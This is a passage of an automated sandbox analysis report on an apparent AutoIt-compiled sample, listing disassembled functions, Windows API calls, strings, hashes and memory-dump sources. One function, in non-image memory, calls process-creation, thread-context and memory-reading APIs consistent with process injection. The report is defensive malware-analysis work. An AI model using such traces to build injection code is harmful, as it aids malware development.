                                                            • Instruction Fuzzy Hash: A831D031508304AFD732EB60DC46FEB77DCAF44304F50862AF5858A0E5DB709648CBA6
                                                            Function 0036686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00364DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364E0F
                                                            • _free.LIBCMT ref: 0039E263
                                                            • _free.LIBCMT ref: 0039E2AA
                                                              • Part of subcall function 00366A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00366BAD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 2861923089-1757145024
                                                            • Opcode ID: 18eb53ceedc67db82bebc6792e405f19f9b038944f9aa9b2a54d4ff2c142c7f6
                                                            • Instruction ID: 246b9f00fd833590f6fd5535fa127cdf5788c2ef8c58c58bc2282e0fb0909f3b
                                                            • Opcode Fuzzy Hash: 18eb53ceedc67db82bebc6792e405f19f9b038944f9aa9b2a54d4ff2c142c7f6
                                                            • Instruction Fuzzy Hash: 6F917D71910219AFCF06EFA4CC919EEB7B8FF18314F10856AF815AB2A1DB71AD05CB50
                                                            Function 003635B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003635A1,SwapMouseButtons,00000004,?), ref: 003635D4
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003635A1,SwapMouseButtons,00000004,?,?,?,?,00362754), ref: 003635F5
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,003635A1,SwapMouseButtons,00000004,?,?,?,?,00362754), ref: 00363617
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: 0ccbf5a3262365c73b5a93cb7ae379a8b60968733c627cd1418e107059a14b13
                                                            • Instruction ID: 6bd489419d3c3ed8422cb44f76042b42cbc3a17954c47e9c461e535b5484b183
                                                            • Opcode Fuzzy Hash: 0ccbf5a3262365c73b5a93cb7ae379a8b60968733c627cd1418e107059a14b13
                                                            • Instruction Fuzzy Hash: 79115771614218BFDB22CF68DC80EAEBBBCEF04740F018569F805DB214E2719F409BA4
                                                            Function 01670070 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0167082B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016708C1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016708E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                            • Instruction ID: e061133ad6bc2d2dd7d80a4211d99eb5b386511a7513109ff7a0c2ecca98c795
                                                            • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                            • Instruction Fuzzy Hash: B362FB30A142589BEB24CFA4CC50BDEB776EF59700F1091A9E10DEB390E7769E81CB59
                                                            Function 003C955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00364EE5: _fseek.LIBCMT ref: 00364EFD
                                                              • Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9824
                                                              • Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9837
                                                            • _free.LIBCMT ref: 003C96A2
                                                            • _free.LIBCMT ref: 003C96A9
                                                            • _free.LIBCMT ref: 003C9714
                                                              • Part of subcall function 00382D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00389A24), ref: 00382D69
                                                              • Part of subcall function 00382D55: GetLastError.KERNEL32(00000000,?,00389A24), ref: 00382D7B
                                                            • _free.LIBCMT ref: 003C971C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                            • Instruction ID: 1ffa577895b785983435910fbad7f3b613eef6d86ef4971d665a4796a529bb4d
                                                            • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                            • Instruction Fuzzy Hash: 26512BB1D04258AFDF269F64CC85B9EBBB9EF48300F10449EF609AB251DB715E908F58
                                                            Function 0038470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction ID: 5f536ce81fc6121791bbb0591d85efc12f60ed5ab336dc9770998ea1102441e4
                                                            • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction Fuzzy Hash: 7B41E634A007479BDF1AEF69C8809AE77A6EF81364B2581BDF825CBE40E771DD408B40
                                                            Function 00364C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: AU3!P/?$EA06
                                                            • API String ID: 4104443479-2942601680
                                                            • Opcode ID: cf2cc0aa7356249226f8160dd776b653009428929e0129ca215746ed79f2fb74
                                                            • Instruction ID: 1fd43877a57a9342a21cc5129cc06489106c518e8b3753e7392dd79d5da887e6
                                                            • Opcode Fuzzy Hash: cf2cc0aa7356249226f8160dd776b653009428929e0129ca215746ed79f2fb74
                                                            • Instruction Fuzzy Hash: 5C414C21E041586BDF239B64C8617BF7FA6DB46300F68C475ED829F28FD6319D4483A1
                                                            Function 00367285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0039EA39
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0039EA83
                                                              • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                              • Part of subcall function 00380791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003807B0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: 08e7c50e9c84cc8d975f68b2e12c73088f5e3d4ad25a7e5fc94c340ade763e52
                                                            • Instruction ID: f05197229de63c03821d0e035311a8b448a0dbf0b19e096cea8beeb08ebf2e9d
                                                            • Opcode Fuzzy Hash: 08e7c50e9c84cc8d975f68b2e12c73088f5e3d4ad25a7e5fc94c340ade763e52
                                                            • Instruction Fuzzy Hash: 9D219071A002589BCF52DF94D845BEE7BFCAF49714F00805AE408AB281DBF859898FA1
                                                            Function 003C98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 003C98F8
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003C990F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: f37f65b28a0601b194858a0e7bf8f79f55787c39532236dd80b09ae3f5146a08
                                                            • Instruction ID: 3b4dcdedd6529c0b9b9aafea56993148c35565e92ca5376c7f22f703c5fc3ec7
                                                            • Opcode Fuzzy Hash: f37f65b28a0601b194858a0e7bf8f79f55787c39532236dd80b09ae3f5146a08
                                                            • Instruction Fuzzy Hash: 16D05E7954030DAFDB60ABA4DC8EFEA773CE704700F0007B1BB54990E1EBB095988B95
                                                            Function 003DCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 14fbf2fe84fe281921f9a1b000b6b740320a8d30e4f355b905e3aa24fcb395ab
                                                            • Instruction ID: 9373082971ecb5d8e4107c82cec66502bd88a02844b64342e3198bf61d4578a5
                                                            • Opcode Fuzzy Hash: 14fbf2fe84fe281921f9a1b000b6b740320a8d30e4f355b905e3aa24fcb395ab
                                                            • Instruction Fuzzy Hash: C3F138B16183019FCB15DF28D480A6ABBE9FF89314F15892EF8999B351D730E945CF82
                                                            Function 0036434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00364370
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00364415
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00364432
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$_memset
                                                            • String ID:
                                                            • API String ID: 1505330794-0
                                                            • Opcode ID: f9de4c4213b7f5ee76ce85fd8dc61fbd59fe92b651dc7b2b2838cae9be824b04
                                                            • Instruction ID: d1ff23cb32d91d49ac15ebc27394f24345fe770eff92e1489eb44f25e50bd257
                                                            • Opcode Fuzzy Hash: f9de4c4213b7f5ee76ce85fd8dc61fbd59fe92b651dc7b2b2838cae9be824b04
                                                            • Instruction Fuzzy Hash: FF3191B4A04701CFC732DF25D885A9BBBF8FB48309F00493EE59A86291E770A944CB56
                                                            Function 0038571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 00385733
                                                              • Part of subcall function 0038A16B: __NMSG_WRITE.LIBCMT ref: 0038A192
                                                              • Part of subcall function 0038A16B: __NMSG_WRITE.LIBCMT ref: 0038A19C
                                                            • __NMSG_WRITE.LIBCMT ref: 0038573A
                                                              • Part of subcall function 0038A1C8: GetModuleFileNameW.KERNEL32(00000000,004233BA,00000104,?,00000001,00000000), ref: 0038A25A
                                                              • Part of subcall function 0038A1C8: ___crtMessageBoxW.LIBCMT ref: 0038A308
                                                              • Part of subcall function 0038309F: ___crtCorExitProcess.LIBCMT ref: 003830A5
                                                              • Part of subcall function 0038309F: ExitProcess.KERNEL32 ref: 003830AE
                                                              • Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28
                                                            • RtlAllocateHeap.NTDLL(01630000,00000000,00000001,00000000,?,?,?,00380DD3,?), ref: 0038575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 32f07cfdee57f52e9792b64e64da774349c5a4c70a40a35a4b6d4488d3bf08ee
                                                            • Instruction ID: 62a69dcd647fced57177c00f0697de00f798e7739de1bbeb6853785cc8d9e51e
                                                            • Opcode Fuzzy Hash: 32f07cfdee57f52e9792b64e64da774349c5a4c70a40a35a4b6d4488d3bf08ee
                                                            • Instruction Fuzzy Hash: C101B175340B01DAE6233B38EC82A2E739C9B82762F6145FAF5059E2C1DFB49C414765
                                                            Function 003C98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003C9548,?,?,?,?,?,00000004), ref: 003C98BB
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003C9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003C98D1
                                                            • CloseHandle.KERNEL32(00000000,?,003C9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003C98D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: 070aa61eeef2d7fdb7edc87070267b15dc0112d98e2f3a6396458671afe95181
                                                            • Instruction ID: 6135cbd23bc18e7fe1cd8876873d322a6cf0d9cd3287494e59688c9c177b3d3c
                                                            • Opcode Fuzzy Hash: 070aa61eeef2d7fdb7edc87070267b15dc0112d98e2f3a6396458671afe95181
                                                            • Instruction Fuzzy Hash: 29E04F32140218BBDB321B54EC49F9A7B19AB06761F118220FB14A90E087B119119798
                                                            Function 003C8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 003C8D1B
                                                              • Part of subcall function 00382D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00389A24), ref: 00382D69
                                                              • Part of subcall function 00382D55: GetLastError.KERNEL32(00000000,?,00389A24), ref: 00382D7B
                                                            • _free.LIBCMT ref: 003C8D2C
                                                            • _free.LIBCMT ref: 003C8D3E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                            • Instruction ID: f5f8503ce71bb0d127822cfdf3c775b001977c6d61ee6abb72f20e7657a38a92
                                                            • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                            • Instruction Fuzzy Hash: DFE012B1601B014ACB26B678AA44F9357EC4F98352715095DB41EDB186CE64FD468324
                                                            Function 0036A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CALL
                                                            • API String ID: 0-4196123274
                                                            • Opcode ID: 0e56bf02bfc66ae9d88fdd003929d7a72b9d21b4889d607e24d94cccb5728b4c
                                                            • Instruction ID: c1594d96c9514b29438dbbf19723f670dd3294be334bf64b5be33c037053a66c
                                                            • Opcode Fuzzy Hash: 0e56bf02bfc66ae9d88fdd003929d7a72b9d21b4889d607e24d94cccb5728b4c
                                                            • Instruction Fuzzy Hash: 44225670508700DFCB26DF24C490A6ABBE5BF85304F15C96DE88A9B666D735EC85CF82
                                                            Function 00367A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                            • Instruction ID: 104a360ddf9b9cecb89ceb5e3ef0003d9ff947073bd2b875999681f6295c7868
                                                            • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                            • Instruction Fuzzy Hash: 1431D4B1604A06AFC705DF68C8D1E69F3A9FF48324755C629E429CB791EB30E924CB90
                                                            Function 003647D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 00364834
                                                              • Part of subcall function 0038336C: __lock.LIBCMT ref: 00383372
                                                              • Part of subcall function 0038336C: DecodePointer.KERNEL32(00000001,?,00364849,003B7C74), ref: 0038337E
                                                              • Part of subcall function 0038336C: EncodePointer.KERNEL32(?,?,00364849,003B7C74), ref: 00383389
                                                              • Part of subcall function 003648FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00364915
                                                              • Part of subcall function 003648FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0036492A
                                                              • Part of subcall function 00363B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00363B68
                                                              • Part of subcall function 00363B3A: IsDebuggerPresent.KERNEL32 ref: 00363B7A
                                                              • Part of subcall function 00363B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004252F8,004252E0,?,?), ref: 00363BEB
                                                              • Part of subcall function 00363B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00363C6F
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00364874
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                            • String ID:
                                                            • API String ID: 1438897964-0
